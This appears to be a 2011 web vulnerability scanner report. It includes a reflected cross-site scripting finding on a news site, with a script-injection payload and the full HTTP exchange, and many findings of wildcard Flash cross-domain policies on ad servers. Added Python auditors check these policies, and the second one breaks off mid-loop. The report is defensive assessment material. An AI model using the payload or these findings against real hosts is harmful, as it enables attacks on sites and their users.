Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21778"><script>alert(1)</script>f0cd34065fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:34:59 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 353
Location: http://timeswv.com/favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:34:59 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1">
...[SNIP]...

7. Flash cross-domain policy
There are 285 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
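Added example, not part of the scanner output: a small auditor that reads a crossdomain.xml body and reports the grants the background and remediation above tell you to review. The first two policy bodies are the ones recorded for 7.1 and 7.2 below; the third is a constructed restrictive policy (app.example.com is a hypothetical host) included for contrast. The severity labels follow the vocabulary this report uses.

```python
import xml.etree.ElementTree as ET

# Added example: policy bodies recorded for 7.1 and 7.2, plus one constructed for contrast.
POLICIES = {
    "a.collective-media.net (7.1)": """<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>""",
    "a.tribalfusion.com (7.2)": """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>""",
    # Constructed restrictive policy; app.example.com is hypothetical.
    "restrictive (constructed)": """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="app.example.com" secure="true"/>
</cross-domain-policy>""",
}

SEVERITY_ORDER = {"High": 3, "Medium": 2, "Information": 1}


def audit_policy(xml_text: str):
    """Return a list of (severity, message) findings for one crossdomain.xml body.
    xml.etree does not fetch the external DTD referenced by a DOCTYPE, so the
    SYSTEM identifier in real-world policies is parsed but never retrieved."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("Information", f"root element is <{root.tag}>, not a cross-domain policy")]
    findings = []
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append(("High", 'allow-access-from domain="*": a SWF on any domain can '
                                     "perform two-way interaction in the logged-in user's context"))
        elif domain.startswith("*."):
            findings.append(("Medium", f'allow-access-from domain="{domain}": every subdomain is trusted'))
        if el.get("secure", "true").lower() == "false":
            findings.append(("Medium", f'secure="false" for "{domain}": SWFs loaded over plain HTTP '
                                       "may access this host over HTTPS"))
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            headers = el.get("headers", "")
            findings.append(("High", f'allow-http-request-headers-from domain="*" headers="{headers}": '
                                     "any domain may attach those request headers"))
    site_control = root.find("site-control")
    if site_control is not None:
        permitted = site_control.get("permitted-cross-domain-policies", "")
        findings.append(("Information", f'site-control permitted-cross-domain-policies="{permitted}"'))
    return findings


def worst_severity(xml_text: str) -> str:
    """Collapse the findings for a policy into the single severity the report would assign."""
    findings = audit_policy(xml_text)
    if not findings:
        return "None"
    return max((sev for sev, _ in findings), key=SEVERITY_ORDER.__getitem__)


if __name__ == "__main__":
    for label, body in POLICIES.items():
        print(f"{label}: {worst_severity(body)}")
        for sev, msg in audit_policy(body):
            print(f"  [{sev}] {msg}")
```

The 7.1 policy is the more permissive of the two recorded ones: besides the wildcard grant it sets secure="false" and lets any domain send arbitrary request headers, both of which the auditor reports separately so they are not lost behind the single High rating.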


7.1. http://a.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

7.2. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 03 May 2011 15:41:23 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.4. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 03 May 2011 15:41:31 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 03 May 2011 15:41:31 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.5. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:14d1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 03 May 2011 15:43:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.6. http://ads.specificmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:11 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Fri, 16 Oct 2009 21:03:11 GMT
ETag: "54b7f7-110-47613b93bc1c0"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.7. http://adserv.impactengine.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserv.impactengine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserv.impactengine.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:40:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 May 2010 00:07:11 GMT
Accept-Ranges: bytes
Content-Length: 103
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/xml
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: 1cb1071157f224d5a858bf570e3b154a551934c5a1a6da2bf5612b5e9df865af4777337ef35745fb,45d6e4ccdb04fe059afa8c46e5821678d68c542595b1ddb3f2ee45052117214715009bff39f744b3
Via: 1.0 fee706bb2dcbccabb9a09a17e9d6037c.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.8. http://afe.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml
Content-Length: 194
Date: Tue, 03 May 2011 15:42:09 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.9. http://aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:96c"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 15:41:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

7.10. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:18 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.11. http://as.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:31 GMT
ETag: "17b0daf-e6-41faec0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 03 May 2011 15:41:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.12. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.13. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:42:35 GMT
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.14. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk. This policy also sets secure="false" on the wildcard rule, which on a host that is also served over HTTPS additionally lets a SWF loaded over plain HTTP reach the HTTPS content.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 03 May 2011 15:41:29 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.15. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.16. http://c.yardbarker.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.yardbarker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.yardbarker.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 03 May 2011 17:09:23 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.17. http://cache.specificmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:14 GMT
Server: PWS/1.7.2.1
X-Px: ht-d iad-agg-n27.panthercdn.com
ETag: "17186ff-110-4764a5a086640"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2011 22:30:53 GMT
Age: 148281
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 14:13:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.18. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 03 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.19. http://cms.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 04 May 2011 15:42:40 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 03 May 2011 15:42:40 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.20. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 15:41:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:33:37 GMT
Content-length: 202
Etag: "ca-4ceae1b1"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.21. http://d13.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d13.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d13.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1739410876
Date: Tue, 03 May 2011 15:41:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

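Every crossdomain.xml finding in this section rests on the same condition: an allow-access-from rule with domain="*", which lets a SWF served from any origin send requests to the host carrying the victim's cookies and read the responses. The checker below is an added example for this report, not part of the scanner output or of any listed vendor's code. It parses a policy and flags the wildcard rule, secure="false" (as captured for bh.contextweb.com), a site-control of permitted-cross-domain-policies="all", and a wildcard allow-http-request-headers-from, then maps the findings onto a severity (the High/Medium/None mapping is an assumption, not the scanner's). The sample policies are constructed, modelled on the responses shown above; example.com in the scoped sample is a placeholder host.

```python
"""Audit Flash crossdomain.xml policies for over-permissive rules.

Added example for this report; not part of the scanner output or of any
listed vendor's code. The sample policies are constructed, modelled on the
responses captured in the findings above.
"""
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample: the bare wildcard policy most hosts in this section serve.
WILDCARD_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed sample: wildcard plus secure="false", a permissive site-control
# and a wildcard header rule.
WILDCARD_INSECURE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed sample of a scoped policy (example.com is a placeholder host).
TIGHT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="www.example.com"/>
<allow-access-from domain="*.example.com"/>
</cross-domain-policy>"""


def audit_policy(xml_text):
    """Return (kind, detail) findings for the over-permissive settings in a policy.

    ElementTree does not fetch the external DTD named in the DOCTYPE, so
    parsing a policy from an untrusted host causes no network access.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document: <%s>" % root.tag)
    findings = []
    site_control = root.find("site-control")
    if site_control is not None and site_control.get("permitted-cross-domain-policies") == "all":
        # "all" honours a policy file at any path on the host, so a file upload
        # or similar flaw elsewhere on the host can widen the policy.
        findings.append(("site-control-all", 'permitted-cross-domain-policies="all"'))
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            # Any origin's SWF may send requests with the victim's cookies and read the responses.
            findings.append(("wildcard-domain", 'allow-access-from domain="*"'))
        if rule.get("secure", "true").lower() == "false":
            # On an HTTPS host this lets a SWF loaded over plain HTTP reach HTTPS content.
            findings.append(("secure-false", 'domain="%s" secure="false"' % domain))
    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*":
            findings.append(("wildcard-headers", 'headers="%s"' % rule.get("headers", "")))
    return findings


def severity(findings):
    """Assumed mapping: High when any origin is allowed, Medium for the other
    weaknesses, None for a clean policy."""
    kinds = {kind for kind, _ in findings}
    if "wildcard-domain" in kinds:
        return "High"
    return "Medium" if kinds else "None"


def fetch_policy(host, timeout=10):
    """Fetch http://<host>/crossdomain.xml for a live check (the samples do not use this)."""
    with urllib.request.urlopen("http://%s/crossdomain.xml" % host, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # With hostnames on the command line, audit live policies; otherwise audit the samples.
    targets = [(h, fetch_policy(h)) for h in sys.argv[1:]] or [
        ("wildcard sample", WILDCARD_POLICY),
        ("wildcard+insecure sample", WILDCARD_INSECURE_POLICY),
        ("scoped sample", TIGHT_POLICY),
    ]
    for name, text in targets:
        found = audit_policy(text)
        print("%s: severity=%s" % (name, severity(found)))
        for kind, detail in found:
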